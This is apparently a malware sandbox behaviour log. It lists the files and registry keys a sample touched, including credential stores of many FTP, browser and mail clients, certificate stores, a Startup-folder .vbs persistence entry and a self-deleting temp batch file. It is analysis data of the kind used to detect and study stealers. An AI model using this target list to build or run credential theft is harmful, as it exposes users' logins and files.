C:\ProgramData\RhinoSoft.com\*.* C:\Users\Seven01\AppData\Local\RhinoSoft.com\*.* C:\Users\Seven01\AppData\Roaming\Mozilla\Firefox\*.* C:\Users\Seven01\Desktop\*.* C:\Users\Seven01\AppData\Roaming\FTPGetter\*.* C:\ProgramData\FTPGetter\*.* C:\Users\Seven01\AppData\Local\FTPGetter\*.* C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\*.* C:\ProgramData\Estsoft\ALFTP\*.* C:\Users\Seven01\AppData\Local\Estsoft\ALFTP\*.* C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies C:\Users\Seven01\AppData\Local\Microsoft\Windows\History C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\ C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\ C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\IETldCache\ C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat C:\Users\Seven01\AppData\Roaming\Google\Chrome\*.* C:\Users\Seven01\AppData\Local\Google\Chrome\*.* C:\ProgramData\Google\Chrome\*.* C:\Users\Seven01\AppData\Roaming\Chromium\*.* C:\Users\Seven01\AppData\Local\Chromium\*.* C:\ProgramData\Chromium\*.* C:\Users\Seven01\AppData\Roaming\ChromePlus\*.* C:\Users\Seven01\AppData\Local\ChromePlus\*.* C:\ProgramData\ChromePlus\*.* C:\Users\Seven01\AppData\Roaming\Bromium\*.* C:\Users\Seven01\AppData\Local\Bromium\*.* C:\ProgramData\Bromium\*.* C:\Users\Seven01\AppData\Roaming\Nichrome\*.* C:\Users\Seven01\AppData\Local\Nichrome\*.* C:\ProgramData\Nichrome\*.* C:\Users\Seven01\AppData\Roaming\Comodo\*.* C:\Users\Seven01\AppData\Local\Comodo\*.* C:\ProgramData\Comodo\*.* C:\Users\Seven01\AppData\Roaming\RockMelt\*.* C:\Users\Seven01\AppData\Local\RockMelt\*.* C:\ProgramData\RockMelt\*.* C:\Users\Seven01\AppData\Roaming\Sites\*.* C:\Users\Seven01\AppData\Roaming\Visicom Media\*.* C:\ProgramData\Sites\*.* C:\ProgramData\Visicom Media\*.* C:\Users\Seven01\AppData\Local\Sites\*.* C:\Users\Seven01\AppData\Local\Visicom Media\*.* C:\Users\Seven01\AppData\Roaming\Global Downloader\*.* C:\ProgramData\Global Downloader\*.* C:\Users\Seven01\AppData\Local\Global Downloader\*.* C:\Users\Seven01\AppData\Roaming\BlazeFtp\*.* C:\ProgramData\BlazeFtp\*.* C:\Users\Seven01\AppData\Local\BlazeFtp\*.* C:\ProgramData\3D-FTP\*.* C:\ProgramData\SiteDesigner\*.* C:\Users\Seven01\AppData\Roaming\NetSarang\*.* C:\ProgramData\NetSarang\*.* C:\Users\Seven01\AppData\Local\NetSarang\*.* C:\Users\Seven01\Documents\*.* C:\Users\Seven01\Documents\File di Outlook\*.* C:\Users\Seven01\Documents\Immagini\*.* C:\Users\Seven01\Documents\Musica\*.* C:\Users\Seven01\Documents\Video\*.* C:\Users\Seven01\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\* C:\Users\Seven01\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\* C:\Users\Seven01\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\* C:\Users\Seven01\AppData\Roaming\Cyberduck\*.* C:\ProgramData\Cyberduck\*.* C:\Users\Seven01\AppData\Local\Cyberduck\*.* C:\Users\Seven01\AppData\Roaming\Notepad++\*.* C:\ProgramData\Notepad++\*.* C:\Users\Seven01\AppData\Local\Notepad++\*.* C:\Users\Seven01\AppData\Roaming\FTPInfo\*.* C:\ProgramData\FTPInfo\*.* C:\Users\Seven01\AppData\Local\FTPInfo\*.* C:\Users\Seven01\AppData\Roaming\MapleStudio\ChromePlus\*.* C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\*.* C:\ProgramData\MapleStudio\ChromePlus\*.* C:\Users\Seven01\AppData\Roaming\Yandex\*.* C:\Users\Seven01\AppData\Local\Yandex\*.* C:\ProgramData\Yandex\*.* C:\Users\Seven01\AppData\Roaming\INSoftware\NovaFTP\*.* C:\ProgramData\INSoftware\NovaFTP\*.* C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\*.* C:\Users\Seven01\AppData\Roaming\Pocomail\*.* C:\ProgramData\Pocomail\*.* C:\Users\Seven01\AppData\Local\Pocomail\*.* C:\Users\Seven01\AppData\Roaming\BatMail\*.* C:\ProgramData\BatMail\*.* C:\Users\Seven01\AppData\Local\BatMail\*.* C:\Users\Seven01\AppData\Roaming\The Bat!\*.* C:\ProgramData\The Bat!\*.* C:\Users\Seven01\AppData\Local\The Bat!\*.* C:\Users\Seven01\AppData\Local\Temp\ C:\Users\Seven01\AppData\Local\Temp\15757203.exe \??\MountPointManager \??\PIPE\samr C:\Users\Seven01\AppData\Local\Temp\15759062.bat C:\Users\Seven01\AppData\Local\Temp C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\AppData\Local\Temp\15759062.bat" C:\
Read Files
\Device\KsecDD C:\Windows\Fonts\staticcache.dat C:\Windows\SysWOW64\shell32.dll C:\Users\Seven01\AppData\Local\Temp\filename.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbs C:\Windows\Globalization\Sorting\sortdefault.nls C:\Users\Seven01\AppData\Local\Temp\HWID C:\Windows\win.ini C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat C:\Users\Seven01\AppData\Local\Temp\15757203.exe \??\PIPE\samr C:\Users\Seven01\AppData\Local\Temp\15759062.bat
Write Files
C:\Users\Seven01\AppData\Roaming\subfolder\filename.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbs C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat C:\Users\Seven01\AppData\Local\Temp\15757203.exe \??\PIPE\samr C:\Users\Seven01\AppData\Local\Temp\15759062.bat
Delete Files
C:\Users\Seven01\AppData\Local\Temp\filename.exe C:\Users\Seven01\AppData\Local\Temp\15759062.bat
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Segoe UI HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\filename.exe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\filename.exe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\filename.exe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1045AB6F-6151-3634-8C2C-EE308AA1A6A7} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1045AB6F-6151-3634-8C2C-EE308AA1A6A7}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1045AB6F-6151-3634-8C2C-EE308AA1A6A7}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2608539 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2608539\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2689322 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2689322\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2723430 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2723430\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2821701 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2821701\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2845370 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2845370\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2890375 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2890375\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{23daf363-3020-4059-b3ae-dc4ad39fed19} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{23daf363-3020-4059-b3ae-dc4ad39fed19}\UninstallString 